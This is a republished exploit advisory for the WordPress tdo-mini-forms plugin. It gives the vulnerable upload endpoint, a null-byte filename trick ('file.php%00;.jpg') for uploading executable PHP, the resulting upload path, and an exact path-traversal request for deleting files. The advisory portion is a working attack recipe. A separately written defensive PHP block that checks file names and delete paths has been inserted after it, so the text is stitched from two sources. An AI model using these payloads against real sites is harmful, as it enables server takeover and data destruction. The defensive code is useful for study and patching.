wordpress tdo-mini-forms plugin (rfu/rfd) Vulnerabilities

2012.11.21
Credit: Cold z3ro
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

wordpress tdo-mini-forms plugin (rfu/rfd) Vulnerabilities
------------------------------------------------------------
wordpress tdo-mini-forms plugin (remote file upload/remote file deletion) Vulnerabilities

Author : Cold z3ro , www.hackteach.org , www.s3curi7y.com
Anonymous => You are the man

# Remote file upload :

wordpress/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=

file extension : file.php%00;.jpg
uploaded path : wordpress/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(IP)/$filename.PHP%00;.jpg
Example of uploaded path : wordpress/wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg

# Remote file Deletion =>

Note : using any HTTP POST header modifier.

tdomf_form_id = 1;
deletefile[] = 1;
filepath = $variable ( wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg )
index = NULL

Example of result :
wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&deletefile[]=1&filepath=../../../wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg&index=

Eof;
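The two checks the advisory shows to be missing, written here as an added defensive example (this is not the plugin's own code); the allow-list, the function names and the directory layout argument are assumptions.

```php
<?php
// Added defensive example, not the tdo-mini-forms plugin's own code.
// It addresses the two weaknesses the advisory describes: the upload side
// accepting "name.PHP%00;.jpg" because the suffix check stops at the NUL,
// and the delete side following "../../../" in the filepath parameter.

// Hypothetical allow-list; a real form would take this from its settings.
const TDOMF_ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif', 'pdf'];

// Return a normalised file name that is safe to store, or null to reject.
function tdomf_safe_upload_name(string $name): ?string {
    // A NUL byte or a path separator anywhere in the name is never legitimate.
    if (strpos($name, "\0") !== false || strpbrk($name, "/\\") !== false) {
        return null;
    }
    // Exactly one dot, so a double extension such as "a.php.jpg" is refused
    // and the extension checked is the only extension the file has.
    if (substr_count($name, '.') !== 1) {
        return null;
    }
    [$stem, $ext] = explode('.', $name, 2);
    $ext = strtolower($ext);
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $stem)
        || !in_array($ext, TDOMF_ALLOWED_EXT, true)) {
        return null;
    }
    return $stem . '.' . $ext;
}

// Resolve a client-supplied delete target relative to the form's temp
// directory and refuse anything whose real path leaves that directory.
function tdomf_safe_delete_path(string $tmpBase, int $formId, string $requested): ?string {
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath($tmpBase . DIRECTORY_SEPARATOR . $formId);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "..", so a traversal either resolves outside
    // $base (rejected by the prefix test) or to a nonexistent file (false).
    $target = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_file($target)
        || strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $target;
}
```

Inside WordPress, core's sanitize_file_name() and wp_check_filetype() already cover the name-side checks; the example is self-contained so it also runs outside WordPress.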

References:

http://www.hackteach.org


Copyright 2024, cxsecurity.com